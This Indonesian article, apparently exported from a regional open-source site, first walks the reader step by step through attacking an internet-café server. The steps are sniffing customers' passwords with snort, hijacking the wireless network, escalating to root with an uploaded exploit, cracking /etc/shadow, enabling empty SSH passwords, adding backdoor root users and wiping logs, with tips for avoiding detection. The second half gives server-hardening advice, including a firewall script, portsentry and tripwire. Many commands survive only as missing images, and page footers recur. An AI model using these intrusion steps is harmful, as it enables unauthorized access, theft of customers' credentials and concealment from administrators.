- Untuk mengambil snort versi Windows, Anda bisa mengambilnya pada situs: http://www.snort.org/dl/binaries/win32/
- Lebih baik lagi, jika Anda diperbolehkan untuk menggunakan laptop Anda sendiri. Sehingga langkah-langkah yang
kita lakukan bisa berhasil dengan baik. Pada CD masaji-slax sudah tersedia program aplikasi snort, Anda tinggal
menjalankan saja.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Setelah proses instalasi snort (versi Windows)berjalan dengan baik, Anda bisa melanjutkan operasi dengan cara
melakukan penyadapan jaringan lokal. Jika Anda menggunakan masaji-slax, setelah login shell ketikkan sintaks
perintah sebagai berikut:
[root@masaji-slax:~] # snort -dvi eth0 >> akses
- Perintah tersebut di atas akan menjalankan penyadapan melalui kartu jaringan utama (eth0) kedalam suatu file secara
beruntun. Pastikan bahwa PC Anda menggunakan satu kartu jaringan, atau jika menggunakan dua kartu jaringan,
pastikan bahwa eth0 merupakan kartu jaringan utama yang terhubung ke internet.
- Proses ini membutuhkan waktu yang lama dan kesabaran yang tinggi, serta spasi harddisk yang besar. Karena untuk
mengakses jaringan yang padat dalam waktu 1 jam akan memakan kapasitas harddisk sebesar 100 mb lebih.
- Pada server warnet, biasanya menggunakan dua macam kartu jaringan. Kartu jaringan yang utama biasanya
diarahakan ke jaringan luar, sedangkan kartu jaringan yang kedua digunakan untuk melayani jaringan internal.
- Untuk mengetahui nomor IP yang digunakan oleh server, Anda tekan tombol: [Start]. Seperti pada contoh gambar
berikut:
- Setelah jendela [Run] muncul, ketikan perintah cmd. Seperti terlihat pada contoh gambar berikut ini:
- Pada jendela konsol, ketikkan sintaks perintah sebagai berikut:
tracert www.yahoo.com
- Anda akan segera melihat nomor IP yang muncul dari pelacakan salah satu situs tersebut di atas. Seperti tampak
pada contoh gambar berikut ini:
- Pada gambar di atas, tampak bahwa server menggunakan nomor IP 192.168.0.254 untuk melayani jaringan internal.
Sedangkan nomor IP eksternal atau jaringan luar adalah 10.14.14.1. Ini merupakan petunjuk yang berharga
- Jika proses penyadapan (sniffing) sudah selesai, Anda segera pergi dari warnet yang bersangkutan. Agar tidak
dicurigai oleh operator warnet atau administrator jaringan.
- Melalui jaringan nir kabel (wireless connection)
Penyadapan melalui wireless connection atau jaringan nir kabel, bisa dilakukan bilamana:
- Kita tidak bisa mengakses melalui jaringan lokal
- Kita tidak bisa melakukan pendekatan dengan orang dalam
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- System administrator jaringan termasuk orang yang slebor atau pemula. Sehingga kurang memperhatikan masalah
keamanan yang ada.
- Anda memiliki laptop yang memiliki kartu PCMCIA dan program netstumbler, yang bisa Anda ambil pada situs
http://www.netstumbler.com/downloads/
Adapun caranya adalah sebagai berikut:
- Anda lakukan pastikan bahwa warnet sasaran Anda menggunakan antena wireless dengan frekwensi 2,4 GHz.
- Selanjutnya, Anda bawa laptop Anda kepada sasaran terdekat
- Pasang kartu PCMCIA untuk antena wireless pada laptop Anda. Pada laptop model baru sudah terpasang antena
wireless. Anda tinggal memastikan bahwa wireless device yang ada juga mendukung penggunaan sistem operasi Linux.
- Selanjutnya, jalankan sistem operasi Windows pada laptop.
- Jalankan program netstumbler, tampilannya bisa Anda lihat pada gambar berikut ini:
- Lakukan scanning atau pemindaian jaringan yang ada di sekitar Anda.
- Jika Anda beruntung dan administrator jaringan ISP tidak melakukan penguncian mac jaringan. Anda bisa
menemukan ESSID yang digunakan oleh wanet sasaran Anda. Pada contoh ini akan keluar ESSID Gold
- Kemudian restart PC Anda, dan masukkan masaji-slax kedalamnya.
- Setelah Anda muncul prompt dan Anda masukkan nama user serta password. Ketikkan sintaks perintah berikut ini:
[root@masaji-slax:~] # iwconfig eth1 essid Gold
- Perintah di atas akan memaksa sistem untuk menggunakan essid Gold, dengan asumsi PCMCIA wireless card yang
Anda gunakan dianggap sebagai eth1. Jika salah, Anda bisa gantikan eth1 dengan eth0 atau eth2.
- Dari nomor IP luar yang berhasil Anda dapatkan, kita coba untuk melakukan sniffing, dengan berlaku seolah-olah kita
adalah server warnet sebagai berikut:
- Jika dari ISP yang bersangkutan tidak memberlakukan otorisasi berdasarkan mac atau nomor seri kartu jaringan,
maka kita akan beruntung bisa ikut nebeng jaringan :)
- Selanjutnya, kita tinggal mengetikkan sintaks snort sebagai berikut:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Hasil dari perintah tersebut adalah sebagai berikut:
- Perintah tersebut di atas akan memerintahkan sistem untuk melakukan penyadapan, dimana hasilnya akan disimpan
secara berkesinambungan pada file, yang bernama log.
- Proses ini membutuhkan waktu lama dan kesabaran yang tinggi serta kapasitas harddisk yang besar. Karena untuk
melakukan penyadapan 15 jaringan komputer selama 1 jam akan memakan kapasitas harddisk sebesar 50 MB. Jadi
bersiap-siap beli harddisk baru :).
- Setelah Anda rasa cukup, segera kabur dari situ, sebelum digrebeg oleh warga setempat.
Bilamana salah satu atau kedua prosedur tersebut sudah Anda laksanakan, selanjutnya Anda bisa mengolah hasil
penyadapan dengan cara sebagai berikut:
- Sesampainya di rumah, coba Anda lihat file Anda dengan menggunakan program editor 'vi' sebagai berikut:
[root@masaji-slax:~] # vi /[direktori]/nama_file
- Misalnya file Anda bernama akses dan berada pada direktori /mnt/hda1. Anda ketikkan sintaks perintah sebagai
berikut:
[root@masaji-slax:~] # vi /mnt/hda1/akses
- Anda bisa mencari user yang sedang memasukkan password, dengan cara sebagai berikut:
/password [Enter]
- Anda akan menjumpai user sedang memasukkan nama user dan password untuk semua akses termasuk situs porno.
Seperti tampak pada contoh gambar berikut ini:
- Pada contoh gambar di atas, tampak user sedang memasukkan 'nama user=081326461361'Simpati Zone. Jika
beruntung, Anda juga akan mendapatkan nama user dan password untuk server warnet maupun institusi yang Anda
incar, pada saat administrator jaringan sedang melakukan pemeliharaan jaringan melalui jaringan lokal.
- Melalui proses penyadapan ini, Anda mungkin bisa menemukan sasaran-sasaran baru yang lebih menarik dan lebih
mudah dari sasaran Anda saat ini.
- Kembali kepada sasaran pertama, Anda bisa kembali melakukan serangan pada server warnet, dengan cara wireless
atau jaringan lokal, jika Anda diperbolehkan menggunakan laptop.
- Untuk serangan yang menggunakan jalur wireless, sebaiknya dilakukan pada saat siang hari. Karena jika Anda
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
lakukan pada malam hari, bisa digropyok warga setempat.
- Sedangkan untuk serangan yang menggunakan jaringan lokal, bisa Anda lakukan pada malam hari. Dimana operator
warnet suka mengantuk atau biasanya sedang chatting, sering kali malah browsing situs porno. Sehingga tidak sadar
jika pelanggannya melakukan aksi pembobolan server saat itu.
- Lakukan scanning atau pemindaian server, seperti yang terlihat pada contoh gambar berikut:
- Hasilnya dari scanning bisa Anda lihat pada gambar berikut ini:
- Dari gambar di atas, terlihat bahwa server menyediakan layanan akses 'shell'. Sehingga memungkinkan bagi kita
untuk melakukan tindakan lebih jauh. Selain itu, juga dilengkapi dengan layanan FTP, sehingga kita bisa melakukan
upload file local exploit, yang bisa menjadikan user biasa menjadi setara 'root'.
- Dari pengamatan pada log server yang berhasil diintip, kami menganggap Anda memiliki akses user biasa. Misalnya
user Anda adalah 'tamu', dengan password yang sama. Sekarang kita mulai proses pengambilalihan ini.
- Anda jalankan masaji-slax pada laptop atau PC Anda.
- Anda masuk ke FTP Server sebagai berikut:
- Setelah Anda berhasil masuk, ketikkan mode binary sebagai berikut:
- Selanjutnya, Anda pindah ke direktori /root/tools, dengan perintah sebagai berikut:
- Kemudian Anda upload file sihir yang bernama connect-lnx, dengan menggunakan perintah sebagai berikut:
- Setelah file tersebut selesai Anda upload, keluar dari server, dengan mengetikkan sintaks perintah berikut:
- Jangan lupa juga untuk meng-upload file zip3 ke /home/tamu
- Jika sudah keluar, Anda akses SSH Server dengan perintah sebagai berikut:
- Masukkan nama user dan passwordnya. Tadi Anda temukan usernya adalah tamu dengan password yang sama.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Sekarang Anda sudah masuk ke server dengan aman, ketikkan perintah ls, untuk memastikan file Anda benar-benar
sudah terkirim dengan selamat.
- Jika file connect-lnx benar-benar ada, sekarang aktifkan permission access agar bisa dijalankan atau dieksekusi
sebagai berikut:
- Jalankan file tersebut dengan mengetikan perintah sebagai berikut:
- Sekarang, Anda sudah berubah menjadi setara dengan root
- Selanjutnya, kita coba untuk mengakses file /etc/shadow yang merupakan file paling rahasia di Linux.. Berisi semua
password yang ada pada sistem, terutama password 'root'. perintahnya sebagai berikut:
- Jika Anda berhasil, kemungkinan isinya mirip dengan contoh gambar berikut ini:
- Segera Anda salin file tersebut kedalam direktory /home/tamu, seperti berikut ini:
- Ganti nama file dan perijinannya dengan perintah berikut ini:
- Jalankan juga file zap3 untuk menghapus semua log yang ada, sebagai berikut:
- Segera keluar dari server secepatnya dengan mengetikan perintah:
- Ketik lagi perintah exit, sehingga Anda kembali kepada PC Anda sendiri.
- Sebelum sempat ketahuan, Anda jalankan akses FTP ke server sebagai berikut:
- Anda masukkan nama user tamu, beserta passwordnya sekalian.
- Ambil file file dari server kepada PC Anda, menjalankan perintah berikut:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Kemudian hapus file file dari direktori /home/tamu, dengan menjalankan perintah berikut ini:
- Kemudian segera keluar dari server sasaran.
- Selanjutnya, Anda jalankan masaji-slax
- Masukkan file file pada direktori /root/john
- Jalankan cracker john sebagai berikut:
- Jika mujur, Anda bisa mendapatkan password yang lucu, seperti pada gambar berikut:
- Selanjutnya Anda edit file /etc/ssh/sshd_config, seperti yang ditunjukkan pada gambar berikut ini:
- Selanjutnya, pada baris kalimat:
PermitEmptyPasswords no
Anda ganti menjadi:
PermitEmptyPasswords yes
Seperti yang terlihat pada gambar berikut ini:
- Untuk menyimpan hasil perubahan konfigurasi program SSH Server, Anda bis ketikkan perintah berikut ini:
:[Esc]wq!
Untuk lebih jelasnya, bisa Anda lihat pada contoh gambar berikut ini:
- Selanjutnya, Anda jalankan ulang servis sshd, sebagai berikut:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Lanjutkan dengan membuat user-user baru yang setara dengan root, ketikkan kalimat sebagai berikut:
- Selanjutnya, Anda bisa mengakses server kembali menggunakan program ssh, seperti tampak pada gambar berikut
ini:
- Bersihkan semua log, dengan mengetikkan perintah sebagai berikut:
- Segera keluar dari server target.
- Sekarang, kita ulangi lagi mengakses server dengan user tamu lagi
- Pada saat Anda sudah masuk, Anda coba buat user baru, misalnya user reza2002 dengan password komputer
sebagai berikut:
- Jika Anda berhasil, selamat :) Anda sudah menjadi root
- Sekarang Anda bisa membuat banyak user, tentunya dengan userID dan groupID setara root.
- Untuk memastikan bahwa Anda benar-benar menguasai server sasaran, pastikan membuat file tersebut menjadi
kebal/immune. Dengan mengetikkan sintaks perintah sebagai berikut:
[root@sasaran.net:~] # chattr -iu /etc/passwd
- Selanjutnya jalankan program zap3 untuk membersihkan log seperti tampak pada gambar berikut:
- Sampai di sini proses pengambil-alihan server warnet sudah selesai. Karena pada server warnet biasanya tidak
digunakan untuk hosting maupun menyimpan database, sehingga kita tidak perlu membahas sampai dengan defacing
server.
Tindakan Pencegahan dan Pengamanan server
Kalau kita simak dari contoh-contoh kasus di atas, bisa kita simpulkan bahwa tindakan kejahatan internet sangat
berbahaya dan merusak sekali. elain itu, kita menyadari bahwa pekerjaan yang dilakukan oleh system administrator
ternyata berat. Apa lagi kalau tujuan dari si penyerang bukan lagi sekedar untuk numpang tampang atau popularitas,
namun sudah menjurus pada arah yang sangat berbahaya, seperti pencurian data-data penting.
Karena bila hal ini terjadi, reputasi dari system administratormenjadi taruhannya. Apa lagi bila data-tada yang dicuri
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
tersebut memiliki nilai ekonomis yang sangat tinggi, tidak hanya system administrator yang kehilangan nama baik dan
dipecata dari perusahaan dengan tidak hormat. Hal bahkan bisa membuat institusi terkait menjadi bangkrut.
Berikut ini, beberapa tips yang mungkin bermanfaat bagi Anda yang bergerak dalam pelayanan masyarakat.
- Pastikan hanya menginstal program-program yang diperlukan saja, selebihnya diabaikan.
- Lakukan pengamanan boot loader. Sistem operasi Linux, sebagaimana UNIX variant lainnya memiliki kelemahan
dalam mengamankan bootloader/lilo/grub. Ini dikarenakan untuk berjaga-jaga dalam keadaan darurat, misalnya jika
system administrator lupa password "root", atau melakukan resqueing system. Sehingga memungkinkan orang lain
untuk ikut serta masuk ke sistem tanpa menyertakan pasword root, dengan mengetikkan: linux single atau linux -s pada
saat PC dinyalakan dan lilo memberikan prompt. Untuk mengantisipasinya, Anda perlu memberikan password pada file
/boot/grub/menu.1st, seperti terlihat pada gambar berikut:
- Lakukan pengamanan pada BIOS Pada beberapa kasus, jika si penyerang memiliki akses fisik menuju ke server, dia
bisa melakukan penyalinan data dengan menggunakan CD masaji-slax. CD ini tinggal Anda jalankan, selanjutnya dia
akan mengenali dan melakukan mounting pada harddisk yang ada. Anda tinggal menyalin data-data penting ke USB
Flash. Selanjtunya, sistem langsung bisa Anda ambil alih.
- Backup konfigurasi server Bilamana terjadi pengambil-alihan server, Anda bisa segera memulihkan dengan menyalin
konfigurasi yang ada.
- Lakukan analisa data-data yang akan di-upload di server Ini berlaku bagi Anda yang bergerak di bidang hosting,
sedikit celah pada skrip yang di-upload, memungkinkan orang lain mengambil-alih server Anda, minimal bisa mencuri
data atau melakukan defacing.
- Pemasangan firewall
Jika Anda mempunyai beberapa buah komputer yang saling terhubung lewat jaringan (ethernet misalnya), Anda dapat
menggunakan linux sebagai pintu gerbang (router/gateway) untuk menyambungkan semua komputer Anda menuju
internet.
Router dan gateway sendiri sebenarnya secara teori mempunyai filosofi arti yang berbeda, gateway sebenarnya
mengacu pada alat yang difungsikan untuk menjembatani dua buah jaringan yang mempunyai topologi berbeda,
berbeda subnet, dsb, sedangkan router untuk mengatur pengalamatan paket paket data dalam jaringan yang berbeda
sehingga komunikasi dapat terlaksana.
Akan tetapi dalam kenyataan sehari hari router dan gateway seringkali hanya ditangani oleh sebuah alat saja, hal inilah
yang menyebabkan router selalu diidentikkan dengan gateway, demikian pula sebaliknya.
Pada saat PC kita bisa berhubungan satu sama lain, maka akan kita temui satu persoalan baru, yaitu bagaimana agar
kita tidak kedatangan "tamu tak diundang". Untuk itulah kita buat firewall.
Jika server Anda bukan merupakan layanan untuk publik, tentukan dari host/IP mana saja yang diijinkan untuk
mengakses ke server Anda, kemudian lakukan DENY/DROP/REJECT terhadap paket-paket yang bukan dari host/IP
yang Anda ijinkan, gunakan ipfwadm/ipchains/iptables,ipfw, atau ipf untuk melakukan filtering/firewalling.
Firewall adalah suatu cara untuk membatasi informasi yang dibolehkan masuk dan keluar dari jaringan lokal Anda.
Umumnya host firewall terhubung ke Internet dan LAN lokal Anda, dan akses LAN Anda ke Internet hanya melalui
firewall. Dengan demikian firewall dapat mengendalikan apa yang diterima dan dikirim dari Internet dan LAN Anda.
Firewall adalah teknik yang sangat berguna dan penting dalam mengamankan jaringan Anda. Penting untuk menyadari
bahwa Anda tidak boleh pernah berpikir bahwa dengan memiliki firewall, Anda tidak perlu mengamankan mesin-mesin di
baliknya. Ini kesalahan fatal. Periksa Firewall-HOWTO yang sangat bagus di arsip terbaru sunsite untuk informasi
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
mengenai firewall dan Linux. http://sunsite.unc.edu/mdw/HOWTO/Firewall-HOWTO.html
Berikut ini, contoh skrip firewall yang mungkin bermanfaat bagi Anda:
#!/bin/sh
# File: rc.firewall
# Lokasi: /etc/rc.d/
# Digunakan pada warnet
# Designed by masaji
#
LAN_IP_RANGE="192.168.1.0/24"
LAN_IP="192.168.1.254/32"
LAN_BCAST_ADRESS="192.168.1.255/32"
LOCALHOST_IP="127.0.0.1/32"
HTTP_IP="192.168.1.254/32"
DMZ_HTTP_IP="192.168.1.254/32"
DMZ_DNS_IP="192.168.1.254/32"
DMZ_IP="192.168.1.254/32"
DMZ_IFACE="eth0"
LO_IP="127.0.0.1/32"
LO_IFACE="127.0.0.1/32"
INET_IFACE="ppp0"
LAN_IFACE="eth0"
rule="/sbin/iptables"
MODPROBE="/sbin/modprobe"
ANY="0.0.0.0/0"
SQUID="8080"
DALNET="6667"
HTTP="80"
# Menjalankan beberapa target iptables
$MODPROBE ipt_LOG
$MODPROBE ipt_REJECT
$MODPROBE ipt_MASQUERADE
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
# Dukungan kepada FTP & IRC
$MODPROBE ip_conntrack_ftp
$MODPROBE ip_conntrack_irc
# Menjalankan IP Forward & IP Dynamic
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "1" > /proc/sys/net/ipv4/ip_dynaddr
# Penghapusan filter yang ada (setting ulang)
$rule -P INPUT ACCEPT
$rule -P FORWARD ACCEPT
$rule -P OUTPUT ACCEPT
# Penghapusan aturan yang ada (setting ulang)
$rule -t nat -P PREROUTING ACCEPT
$rule -t nat -P POSTROUTING ACCEPT
$rule -t nat -P OUTPUT ACCEPT
# Membatalkan semua aturan filter & nat iptables
$rule -F
$rule -t nat -F
# Membatalkan semua mata rantai yg tidak terdapat pada filter & iptables
$rule -X
$rule -t nat -X
########################### Intranet Rules ###########################
# Menjalankan forwarding & masquerading
$rule -t nat -A POSTROUTING -o $INET_IFACE -j MASQUERADE
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
# Masquerading
$rule -t nat -A POSTROUTING -s 192.168.1.0/24 -d $ANY -j MASQUERADE
# Transparent proxy
$rule -t nat -A PREROUTING -i $DMZ_IFACE -p tcp --dport $HTTP -j REDIRECT
--to-port $SQUID
# Blokir port yang tidak perlu & membahayakan
# Aturan untuk memblokir ping pada target (radius)
$rule -I INPUT -s $ANY -d 192.168.1.0/24 -p ICMP -j REJECT
# Aturan untuk memblokir NETBIOS Name Service
$rule -A INPUT -j REJECT -p udp --destination-port 137
# Aturan untuk memblokir NETBIOS Datagram Service
$rule -A INPUT -j REJECT -p udp --destination-port 138
# Aturan untuk memblokir NETBIOS Session Service
$rule -A INPUT -j REJECT -p udp --destination-port 139
# Aturan untuk memblokir service smtp (udp)
$rule -A INPUT -j REJECT -p udp --destination-port 25
# Aturan untuk memblokir service telnet (udp)
$rule -A INPUT -j REJECT -p udp --destination-port 23
# Aturan untuk memblokir service socks (udp)
$rule -A INPUT -j REJECT -p udp --destination-port 1080
# Pemblokiran port-port di bawah ini, berguna untuk mengantisipasi ip spoofing
$rule -I INPUT -j REJECT -p udp --destination-port 12345
$rule -I INPUT -j REJECT -p tcp --destination-port 12345
$rule -I INPUT -j REJECT --log -p tcp --destination-port 31337
$rule -I INPUT -j REJECT --log -p udp --destination-port 31337
$rule -I INPUT -j REJECT --log -p tcp --destination-port 12345:12346
$rule -I INPUT -j REJECT --log -p udp --destination-port 12345:12346
- Penggunaan Portsentry
Portsentry dirancang khusus untuk memperlambat proses penjejakan (scanning) yang biasa dilakukan oleh user, baik
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
user eksternal maupun user internal sendiri. Di dalam buku ini sudah disertakan CD, yang salah satunya berisi program
Portsentry.
Cara kerja progrm ini pada dasarnya akan melakukan indikasi terhadap penjajakan (scanning) melalui syslog. Jika ada,
sasaran akan secara otomatis diarahkan kepada /etc/hosts.deny. Portsentry akan melakukan konfigurasiulang terhadap
host lokal terhadap route penjajak (scanner), sehingga akan mengakibatkan sistem menjadi "menghilang". Selanjutnya
host lokal akan melakukan blokir melalui filter yang ada. Berikut ini adalah prosedur instalasi dan penggunaannya
Portsentry bisa Anda ambil pada situs http://sourceforge.net/projects/sentrytools/Adapun cara instalasinya adalah
sebagai berikut:
- Ekstrak program portsentry ke direktori /usr/src, dari direktori dimana Anda meletakkan program portsentry sebagai
berikut:
- Lakukan kompilasi sebagai berikut:
- Masuk ke direktori: /usr/local/psionic/portsentry, seperti tampak pada gambar berikut:
- kemudian lakukan editing terhadap file portsentry.conf. Masukkan port-port yang ingin Anda sembunyikan, misalnya
seperti di bawah ini:
- Pada portsentry ada beberapa pilihan dalam menjalankan program dari level rendah sampai level advance, antara lain:
- portsentry -tcp: basic port-bound TCP mode
- portsentry -udp: basic port-bound UDP mode
- portsentry -stcp: Stealth TCP scan detection
- portsentry -atcp: Advanced TCP stealth scan detection
- portsentry -sudp:"Stealth" UDP scan detection
- portsentry -audp: Advanced "Stealth" UDP scan detection
- Untuk menjalankannya, Anda tinggal mengetikkan perintah misalnya:
[root@dir:~] # portsentry -atcp
- Masukkan perintah tersebut kedalam file /etc/rc.d/rc.local, seperti pada gambar berikut:
- Pemeliharaan System Account Sangat penting bagi Anda untuk senantiasa memeriksa file-file log yang terdapat pada
direktori /var/log
Isi direktori /var/log bisa Anda lihat berikut ini:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Adapun fungsi dari beberapa file tersebut adalah sebagai berikut:
- boot.log: berisi semua aktivitas daemon, yaitu program yang berjalan secara underground. Biasanya program ini
berfungsi untuk menjalankan layanan / service. Misalnya, FTP Server, HTTPd dan lainnya.
- dmesg: fungsi dari file dmesg, adalah mencatat aktivitas server pada saat komputer dinyalakan. Di dalamnya berisi
tentang pengenalan device, keberhasilan/kegagalan mounting partisi dan service. Seperti tampak pada gambar berikut
ini:
- lastlog: berfungsi untuk mencatat siapa saja yang melakukan login pada sistem. Anda mengetahuinya, ketikkan:
[root in:log] # last
Hasilnya akan terlihat sebagai berikut:
- messages: berfungsi untuk mencatat aktivitas server secara aktual. Sehingga, bilamana terjadi penyerangan ataupun
aktivitas user lainnya, akan langsung tercatat. Contohnya, bisa Anda lihat pada gambar berikut ini:
- rpmpkgs: berfungsi untuk mencatat program-program yang diinstall pada server. Isinya antara lain sebagai berikut:
- wtmp: berfungsi untuk mencatat semua kegiatan user yang sedang aktif di dalam server. Untuk mengetahuinya, Anda
bisa mengetikan perintah berikut ini:
Tentunya sangat kompleks dan memakan waktu yang lama untuk mencermati semua kegiatan server, apa lagi jika kita
memiliki banyak server yang harus dipelihara dengan baik.
Ada cara sederhana untuk bisa mencermati semua server yang ada di bawah pengawasan kita, antara lain dengan
membuat skrip yang akan memberikan laporan kepada kita setiap periode waktu tertentu yang kita kehendaki.
Berikut ini, adalah contoh email yang berisi laporan dari setiap server, yang berada di bawah pengawasan kita:
Jika Anda tertarik untuk membuatnya, berikut ini langkah-langkahnya:
- Lakukan login sebagai root
- Pada direktori /root, buat direktori bin sebagai berikut:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Kemudian, masuk ke direktori /root/bin, sebagai berikut:
- Kemudian, buat file laporan sebagai berikut:
- Adapun isi file-nya, bisa Anda buat demikian:
Ganti email di atas dengan email Anda sendiri.
- Simpan hasil pekerjan Anda, dengan mengetikkan sintaks berikut:
:[Esc]wq!
- Kemudian, lakukan editing pada crontab, dengan mengetikkan perintah sebagai berikut:
- Tambahkan kalimat berikut ini:
* 6 * * * root /root/bin/laporan
Seperti tampak pada gambar berikut:
- Simpan hasil pekerjan Anda, dengan mengetikkan sintaks berikut:
:[Esc]wq!
- Pada konfigurasi crontab, pada pembahasan tersebut di atas, laporan akan dikirimkan kepada
masajiatlantisindonesia.com setiap hari jam 6 pagi. Dengan demikian, Anda bisa mulai bekerja pada jam 6 pagi untuk
melakukan pemeriksaan aktivitas server pada malam hari.
- Jalankan layanan / service yang benar-benar dibutuhkan pada pekerjaan Anda. Dengan demikian, bisa dihindari
penyusupan melalui port-port yang tidak kita ketahui.
- Jalankan tripwire: program ini berfungsi untuk melakukan [pencatatan] semua file-file yang ada pada server. Jika ada
penambahan maupun penghapusan file, secara otomatis tripwire akan memberikan laporan kepada system
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
administrator melalui email. Pada tripwire versi terbaru, setiap penambahan maupun penghapusan file harus melewati
otentikasi dari tripwire secara otomatis.
Untuk amannya, Anda dapat menginstalasi tripwire ke floppy, dan kemudian mengeset write protect secara fisik pada
floppy. Dengan demikian penyusup tidak dapat mengganggu tripwire atau merubah database. Sekali Anda telah memiliki
setup tripwire, merupakan ide yang baik untuk menjalankannya sebagai tugas administrasi keamanan normal Anda
untuk melihat jika ada perubahan.
Anda bahkan dapat menambahkan entry crontab untuk menjalankan tripwire dari floppy setiap malam dan mengirimkan
hasilnya kepada Anda di pagi hari. Sesuatu seperti :
masaji:~ # crontab -e
MAILTO=masaji
* 02 * * * root /usr/local/adm/tcheck/tripwire
- Pengamanan File dan Sistem File
Mengamankan file dan sistem file sangat penting, karena akan sangat berarti bagi penyusup untuk menggunakan file
yang ada demi kepentingan penyusup. Misalnya, penggunaan gcc untuk kompilasi program, akan sangat berbahaya jika
dilakukan oleh user yang tidak bisa dipercaya. Beberapa menit persiapan dan perencanaan sebelum menaruh sistem
Anda online dapat membantu melindungi sistem Anda, dan data yang disimpan. Berikut ini beberapa tips untuk
mengamankan file dan sistem file Anda.
- Tidak ada alasan bagi home user kemungkinkan untuk menjalankan program SUID/SGID dari sana. Gunakan opsi
"nosuid" dalam /etc/fstab untuk partisi yang dapat ditulis oleh orang selain root. Anda bisa juga menambahkan "nodev"
dan "noexec" di partisi $HOME/user, juga di /var, yang melarang eksekusi program, dan penciptaan device karakter atau
blok, yang sebenarnya tidak perlu. Misalnya untuk mengamankan direktori /tmp dan direktori /home, contohnya sebagai
berikut:
/dev/hda7 /tmp ext2 nosuid,defaults 1 1
/dev/hdc2 /home ext2 nodev.noexec,defaults 1 2
- Konfigurasi umask penciptaan file pemakai anda seketat mungkin. Setting yang biasa digunakan adalah 022, 033, dan
yang paling ketat adalah 077, dan ditambahkan ke /etc/profile.
- Set limit sistem file. Anda dapat mengendalikan limit tiap pemakai menggunakan module PAM dan
/etc/security/limits.conf. Sebagai contoh, limit untuk kelompok "users" mungkin tampak sebagai berikut :
@users hard core 0
@users hard nproc 50
@users hard rss 5000
Perintah ini berarti melarang penciptaan file core, membatasi jumlah proses hingga 50, dan membatasi penggunaan
memori tiap user hingga 5M.
File /var/log/wtmp dan /var/run/utmp berisi catatan login seluruh pemakai sistem anda. Integritasnya harus dipelihara
karena dapat digunakan untuk menentukan kapan dan dari mana seorang pemakai (atau penyusup potensial) memasuki
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
sistem anda. File-file ini harus memiliki permisi 644, tanpa mempengaruhi operasi sistem normal.
- Jika anda mengekspor sistem file menggunakan NFS, pastikan mengkonfigurasi /etc/exports dengan akses yang
seketat mungkin. Artinya tidak menggunakan wildcard, tidak membolehkan root akses menulis, dan melakukan mount
read-only jika mungkin.
- Bit immutable dapat digunakan untuk mencegah penghapusan atau penimpahan sebuah file yang harus dilindungi
tanpa sengaja. Juga dapat mencegah seseorang menciptakan link simbolik ke file ini, yang telah merupakan sumber
penyerangan melibatkan penghapusan /etc/passwd atau /etc/shadow. Misalkan melindungi kedua dile tersebut di atas,
caranya adalah sebagai berikut:
Perintah di atas akan mengakibatkan file shadow dan passwd tidak akan bisa dihapus dan hanya bisa ditambahi saja
(append).
- File-file SUID dan SGID pada sistem anda adalah risiko keamanan potensial, dan harus diawasi dengan baik. Oleh
karena program-program ini memberi ijin khusus bagi pemakai yang mengeksekusinya, maka perlu dipastikan bahwa
program yang tidak aman tidak diinstal. Trik favorit cracker adalah mengeksploitasi program SUID "root", lalu
meninggalkan program SUID sebagai backdoor untuk masuk di saat lain, meski lubang yang asli telah ditutup. Carilah
seluruh program SUID/SGID di sistem anda, dan catatlah, sehingga anda mengerti setiap perubahan yang dapat
mengindikasikan penyusup potensial. Gunakan perintah berikut untuk mencari seluruh program SUID/SGID di sistem
Anda:
- Perketat sekuriti Anda dengan menyunting file /etc/login.defs, dengan melakukan editing pada bagian :
# Password aging controls:
#
# PASS_MAX_DAYS Maximum number of days a password may be used.
# PASS_MIN_DAYS Minimum number of days allowed between password
changes.# PASS_MIN_LEN Minimum acceptable password length.
# PASS_WARN_AGE Number of days warning given before a password
expires.
#
PASS_MAX_DAYS 30
PASS_MIN_DAYS 0
PASS_MIN_LEN 8
PASS_WARN_AGE 28
- Berikan akses seminim mungkin bagi daemon atau program yang berjalan dan bila mungkin masukkan program
tersebut ke dalam chrooted-jail, tentunya akses yg anda berikan jangan sampai "menjerat" program/daemon tersebut
hingga mati.
- Monitor selalu:
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- proses ('ps ax'),
- log ('/var/log/'),
- file-file yang terbuka ('lsof')
- Perhatikan pula socket yang terbuka, dan socket connections, dengan netstat, contoh:
